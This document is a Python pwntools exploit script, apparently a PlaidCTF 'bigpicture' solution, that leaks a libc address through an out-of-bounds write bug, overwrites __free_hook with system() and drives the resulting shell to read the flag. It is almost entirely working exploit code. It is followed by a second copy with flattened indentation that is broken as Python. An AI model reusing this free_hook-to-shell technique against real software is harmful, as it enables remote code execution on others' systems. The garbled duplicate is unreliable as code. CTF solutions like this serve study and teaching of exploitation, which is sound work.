xpn/bigpicture-exploit.py

## bigpicture-exploit.py
from pwn import *
import struct

WIDTH = 1
HEIGHT = 1000000

LOCAL = False

if LOCAL:
    FREE_HOOK_OFFSET = -1230952
    LIBC_LEAK = -1241056
else:
    FREE_HOOK_OFFSET = -1214568
    LIBC_LEAK = -1224672

# Write a 8 byte value to the provided address
def write(target, val):
    for i in range(0,8):
        line = "-0, %d, %c" % (target+i, chr(val >> (i * 8) & 0xFF))
        p.sendlineafter('>', line)

# Leak data via the 'overwriting' message
def read(target, count):
    data = 0
    for i in range(0,count):
        line = "-0, %d, A" % (target+count-1-i)
        p.sendlineafter('>', line)
        p.recvuntil('overwriting ')
        data = data << 8 | (ord(p.recv(1)))

    return data


libc = ELF('./libc-2.23.so')

print 'PlaidCTF bigpicture POC... by @_xpn_'

if LOCAL:
    p = process('./bigpicture')
else:
    p = remote('bigpicture.chal.pwning.xxx', 420)

print '[/] Sending our size of %d x %d' % (WIDTH, HEIGHT)
p.sendline(str(WIDTH) + ' x ' + str(HEIGHT))

print '[/] Attempting to leak pointer from LibC'
data = read(LIBC_LEAK, 6)
print '[/] Pointer leaked as %x' % (data)
print "[/] LibC base address calculated as: %x" % (data - 129030)

# Update our local libc memory address
libc.address = data - 129030

print "[/] system() address %x " % (libc.symbols['system'])
print "[/] Writing 'sh' to memory"
write(0, ord('s'))
write(1, ord('h'))

print "[/] Setting __free_hook() -> system()"
write(FREE_HOOK_OFFSET, libc.symbols['system'])

print "[/] All done, hopefully we have a shell!"
p.sendlineafter('>','quit')
p.sendline('ls -alF /home/bigpicture/' )
p.sendline('cat /home/bigpicture/flag' )
while True:
    print p.recv()
	from pwn import *
	import struct

	WIDTH = 1
	HEIGHT = 1000000

	LOCAL = False

	if LOCAL:
	FREE_HOOK_OFFSET = -1230952
	LIBC_LEAK = -1241056
	else:
	FREE_HOOK_OFFSET = -1214568
	LIBC_LEAK = -1224672

	# Write a 8 byte value to the provided address
	def write(target, val):
	for i in range(0,8):
	line = "-0, %d, %c" % (target+i, chr(val >> (i * 8) & 0xFF))
	p.sendlineafter('>', line)

	# Leak data via the 'overwriting' message
	def read(target, count):
	data = 0
	for i in range(0,count):
	line = "-0, %d, A" % (target+count-1-i)
	p.sendlineafter('>', line)
	p.recvuntil('overwriting ')
	data = data << 8 \| (ord(p.recv(1)))

	return data


	libc = ELF('./libc-2.23.so')

	print 'PlaidCTF bigpicture POC... by @_xpn_'

	if LOCAL:
	p = process('./bigpicture')
	else:
	p = remote('bigpicture.chal.pwning.xxx', 420)

	print '[/] Sending our size of %d x %d' % (WIDTH, HEIGHT)
	p.sendline(str(WIDTH) + ' x ' + str(HEIGHT))

	print '[/] Attempting to leak pointer from LibC'
	data = read(LIBC_LEAK, 6)
	print '[/] Pointer leaked as %x' % (data)
	print "[/] LibC base address calculated as: %x" % (data - 129030)

	# Update our local libc memory address
	libc.address = data - 129030

	print "[/] system() address %x " % (libc.symbols['system'])
	print "[/] Writing 'sh' to memory"
	write(0, ord('s'))
	write(1, ord('h'))

	print "[/] Setting __free_hook() -> system()"
	write(FREE_HOOK_OFFSET, libc.symbols['system'])

	print "[/] All done, hopefully we have a shell!"
	p.sendlineafter('>','quit')
	p.sendline('ls -alF /home/bigpicture/' )
	p.sendline('cat /home/bigpicture/flag' )
	while True:
	print p.recv()